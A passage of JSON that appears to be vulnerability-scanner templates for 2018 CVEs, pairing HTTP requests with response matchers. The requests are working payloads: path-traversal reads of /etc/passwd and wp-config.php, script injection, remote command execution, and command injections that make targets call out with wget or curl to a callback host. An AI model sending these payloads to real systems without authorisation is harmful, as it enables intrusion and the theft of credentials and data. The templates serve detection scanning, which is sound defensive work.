Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php","{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-18777","info":{"name":"Microstrategy Web 7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19915","info":{"name":"DomainMOD <=4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/host.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test\n","GET /assets/hosting.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-1335","info":{"name":"Apache Tika <1.1.8-  Header Command Injection","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/meta"],"body":"var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");","headers":{"X-Tika-OCRTesseractPath":"cscript","X-Tika-OCRLanguage":"//E:Jscript","Expect":"100-continue","Content-type":"image/jp2","Connection":"close"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: text/csv"]},{"type":"word","part":"body","words":["org.apache.tika.parser.DefaultParser","org.apache.tika.parser.gdal.GDALParse"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9845","info":{"name":"Etherpad Lite <1.6.4 - Admin Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Etherpad version","Plugin manager","Installed parts"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19365","info":{"name":"Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-2791","info":{"name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{BaseURL}}\n","GET /cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1\nHost: {{BaseURL}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(24)</script>","Missing translation key"],"condition":"and"}]}]},{"id":"CVE-2018-10141","info":{"name":"Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var valueUser = \"j\";-alert(1)-\"x\";"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20608","info":{"name":"Imcat 4.4 - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/imcat/root/tools/adbug/binfo.php?phpinfo1"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2018-7490","info":{"name":"uWSGI PHP Plugin Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8033","info":{"name":"Apache OFBiz 16.11.04 - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12613","info":{"name":"PhpMyAdmin <4.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18925","info":{"name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/passwd;\n","GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=en-US; i_like_gogits=../../../../etc/dummy;\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 500 && status_code_2 == 200 && contains(body_2, \"<meta name=\\\"author\\\" content=\\\"Gogs\\\" />\")"]}]}]},{"id":"CVE-2018-10095","info":{"name":"Dolibarr <7.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16761","info":{"name":"Eventum <3.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/select_project.php?url=http://interact.sh","{{BaseURL}}/clock_status.php?current_page=http://interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-19439","info":{"name":"Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"],"matchers":[{"type":"word","part":"body","words":["<script>alert(1337)</script><!--</TITLE>"]}]}]},{"id":"CVE-2018-7602","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?q=user%2Flogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n","GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\nHost: {{Hostname}}\n","POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n","POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_build_id={{form_build_id}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","words":["CVE-2018-7602-POC"]}],"extractors":[{"type":"regex","name":"userid","group":1,"regex":["<meta about=\"([/a-z0-9]+)\" property=\"foaf"],"internal":true,"part":"body"},{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"form_token\" value=\"(.*)\" />"],"internal":true,"part":"body"},{"type":"regex","name":"form_build_id","group":1,"regex":["<input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-16288","info":{"name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10956","info":{"name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9205","info":{"name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16670","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/user/values.xml?var=STATUS"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["<values><variable><id>","Reader.STATUS"],"condition":"and"}]}]},{"id":"CVE-2018-6008","info":{"name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16167","info":{"name":"LogonTracer <=1.2.0 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-16979","info":{"name":"Monstra CMS 3.0.4 - HTTP Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["new line detected in","cryptographp.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16299","info":{"name":"WordPress Localize My Post 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10823","info":{"name":"D-Link Routers - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14474","info":{"name":"Orange Forum 1.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?next=http://interact.sh/?app.scan/","{{BaseURL}}/signup?next=http://interact.sh/?app.scan/"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-12296","info":{"name":"Seagate NAS OS 4.3.15.1 - Server Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/external/7.0/system.System.get_infos HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["\"version\":","\"serial_number\":"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["\"version\": \"([0-9.]+)\""],"part":"body"}]}]},{"id":"CVE-2018-12031","info":{"name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd","{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18608","info":{"name":"DedeCMS 5.7 SP2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>","DedeCMS Error Warning!"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12675","info":{"name":"SV3C HD Camera L Series - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"word","part":"body","words":["<META http-equiv=\"Refresh\" content=\"0;URL=http://interact.sh\">"]}]}]},{"id":"CVE-2018-16139","info":{"name":"BIBLIOsoft BIBLIOpac 2008 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bibliopac/bin/wxis.exe/bibliopac/?IsisScript=bibliopac/bin/bibliopac.xic&db=\"><script>prompt(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>prompt(document.domain)</script>.xrf"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-0127","info":{"name":"Cisco RV132W/RV134W Router - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dumpmdm.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Dump","MDM","cisco","admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5316","info":{"name":"WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script>\"><script>alert(document.domain)</script>","Authenticate your card"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18069","info":{"name":"WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin.php"],"body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\"><script>alert(0);</script>\n","host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(tolower(header), \"text/html\")","contains(set_cookie, \"_icl_current_admin_language\")","contains(body, \"\\\"><script>alert(0);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2018-12634","info":{"name":"CirCarLife Scada <4.3 - System Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/log"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","words":["user.debug","user.info","EVSE"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-13379","info":{"name":"Fortinet FortiOS - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"],"matchers":[{"type":"regex","part":"body","regex":["^var fgt_lang ="]}]}]},{"id":"CVE-2018-16836","info":{"name":"Rubedo CMS <=3.4.0 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7662","info":{"name":"CouchCMS <= 2.0 - Path Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/mysql2i/mysql2i.func.php","{{BaseURL}}/addons/phpmailer/phpmailer.php"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["mysql2i.func.php on line 10","Fatal error: Cannot redeclare mysql_affected_rows() in"],"condition":"and"},{"type":"word","part":"body","words":["phpmailer.php on line 10","Fatal error: Call to a menber function add_event_listener() on a non-object in"],"condition":"and"}]}]},{"id":"CVE-2018-14064","info":{"name":"VelotiSmart Wifi - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11759","info":{"name":"Apache Tomcat JK Connect <=1.2.44 - Manager Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jkstatus","{{BaseURL}}/jkstatus;"],"matchers-condition":"and","matchers":[{"type":"word","words":["JK Status Manager"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20462","info":{"name":"WordPress JSmol2WP <=1.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12909","info":{"name":"Webgrind <= 1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","webgrind"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20011","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/category.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=\n","GET /assets/categories.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-19458","info":{"name":"PHP Proxy 3.0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9118","info":{"name":"WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"}]}]},{"id":"CVE-2018-11709","info":{"name":"WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1273","info":{"name":"Spring Data Commons - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /account HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\n\nname[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n"],"payloads":{"command":["cat /etc/passwd","type C:\\/Windows\\/win.ini"]},"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"}]}]},{"id":"CVE-2018-17153","info":{"name":"Western Digital MyCloud NAS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /web/google_analytics.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: isAdmin=1; username=admin;\n\ncmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23\n"],"matchers":[{"type":"dsl","dsl":["regex(\"uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)\", body)","contains(body, \"ganalytics\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2018-18570","info":{"name":"Planon <Live Build 41 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10093","info":{"name":"AudioCode 420HD - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command.cgi?cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["admin:.*:*sh$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14912","info":{"name":"cgit < 1.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14574","info":{"name":"Django - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//www.interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://www.interact.sh","Location: http://www.interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2018-10562","info":{"name":"Dasan GPON Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n","POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-2392","info":{"name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /XMLCHART HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary={{randstr_1}}\n\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_2}}\"; filename=\"{{randstr_3}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <ChartData>\n      <Categories>\n        <Category>ALttP</Category>\n      </Categories>\n      <Series label=\"{{randstr_4}}\">\n        <Point>\n          <Value type=\"y\">12345</Value>\n        </Point>\n      </Series>\n    </ChartData>\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_5}}\"; filename=\"{{randstr_6}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <!DOCTYPE Extension [<!ENTITY xxe SYSTEM \"/etc/passwd\">]>\n    <SAPChartCustomizing version=\"1.1\">\n      <Elements>\n        <ChartElements>\n          <Title>\n            <Extension>&xxe;</Extension>\n          </Title>\n        </ChartElements>\n      </Elements>\n    </SAPChartCustomizing>\n--{{randstr_1}}--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Picture","Info","/output/"],"condition":"and"},{"type":"word","part":"body","words":["ImageMap","Errors"],"condition":"or"},{"type":"word","part":"header","words":["text/html","SAP Internet Graphics Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16716","info":{"name":"NCBI ToolBox - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19386","info":{"name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"],"matchers-condition":"and","matchers":[{"type":"word","words":["<a href=\"javascript:alert(document.domain)//"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9995","info":{"name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/device.rsp?opt=user&cmd=list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uid\":","\"pwd\":","\"view\":","playback"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000671","info":{"name":"Sympa version =>6.2.16 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email="],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-12054","info":{"name":"Schools Alert Management Script - Arbitrary File 